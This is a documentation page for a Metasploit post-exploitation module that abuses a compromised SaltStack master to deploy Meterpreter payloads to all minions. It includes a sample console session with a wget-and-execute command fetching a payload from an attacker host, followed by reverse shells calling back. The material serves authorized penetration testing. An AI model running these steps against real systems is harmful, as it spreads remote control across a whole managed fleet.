adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
11818c2812626be6b6eaeb63c8cc2342eaf38ff2
metasploit-gs/documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md
T
h00die 2cfcb74303 saltstack review
2024-01-10 17:09:02 -05:00

4.2 KiB
Raw Blame History

Vulnerable Application

This exploit module uses saltstack salt to deploy a payload and run it on all targets which have been selected (default all). Currently only works against nix targets.

Vulnerable Host

A vulnerable host install can be found in this Docker environment.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Get an initial shell on the box
  4. Do: use exploit/linux/local/saltstack_salt_minion_deployer
  5. Do: set session [#]
  6. Do: run
  7. You should get sessions on all the targeted hosts

Options

SALT

Location of salt-master executable if not in a standard location. This is added to a list of default locations which includes /usr/bin/salt-master, /usr/local/bin/salt-master. Defaults to ``

MINIONS

Which minions to target. Defaults to *

WritableDir

A directory on the compromised host we can write our payload to. Defaults to /tmp

TargetWritableDir

A directory on the target hosts we can write and execute our payload to. Defaults to /tmp

CALCULATE

This will calculate how many hosts may be exploitable by using Ansible's ping command.

ListenerTimeout

How many seconds to wait after executing the payload for hosts to call back. If set to 0, wait forever. Defaults to 60

Scenarios

Minion 3002.2 on Ubuntu 20.04

Get initial access to the system. In this case, root was required to execute salt commands successfully.

resource (salt_deploy.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (salt_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (salt_deploy.rb)> set srvport 8181
srvport => 8181
resource (salt_deploy.rb)> set target 7
target => 7
resource (salt_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (salt_deploy.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8181/hvy2Ol
[*] Server started.
[*] Run the following command on the target machine:
wget -qO exVJILEV --no-check-certificate http://1.1.1.1:8181/hvy2Ol; chmod +x exVJILEV; ./exVJILEV& disown
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:45200) at 2023-12-16 09:59:02 -0500

resource (salt_deploy.rb)> use exploit/linux/local/saltstack_salt_minion_deployer
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
resource (salt_deploy.rb)> set session 1
session => 1
resource (salt_deploy.rb)> set verbose true
verbose => true
resource (salt_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (salt_deploy.rb)> set lport 9996
lport => 9996
[msf](Jobs:1 Agents:0) exploit(linux/local/saltstack_salt_minion_deployer) > 

[msf](Jobs:1 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > 
[*] Started reverse TCP handler on 1.1.1.1:9996 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] /tmp is writable, and salt-master executable found
[+] The target is vulnerable.
[*] Attempting to list minions
[*] minions:
- mac_minion
- salt-minion
- window-salt-minion
minions_denied: []
minions_pre: []
minions_rejected: []
[+] 3.3.3.3:45200 - minion file successfully retrieved and saved to /root/.msf4/loot/20231216100004_default_3.3.3.3_saltstack_minion_890818.yaml
[+] Minions List
============

 Status    Minion Name
 ------    -----------
 Accepted  mac_minion
 Accepted  salt-minion
 Accepted  window-salt-minion

[+] 3 minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
[*] Writing '/tmp/E76Azw' (336 bytes) ...
[*] Copying payload to minions

[*] Executing payloads
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9996 -> 2.2.2.2:36850) at 2023-12-16 10:00:46 -0500
Reference in New Issue View Git Blame Copy Permalink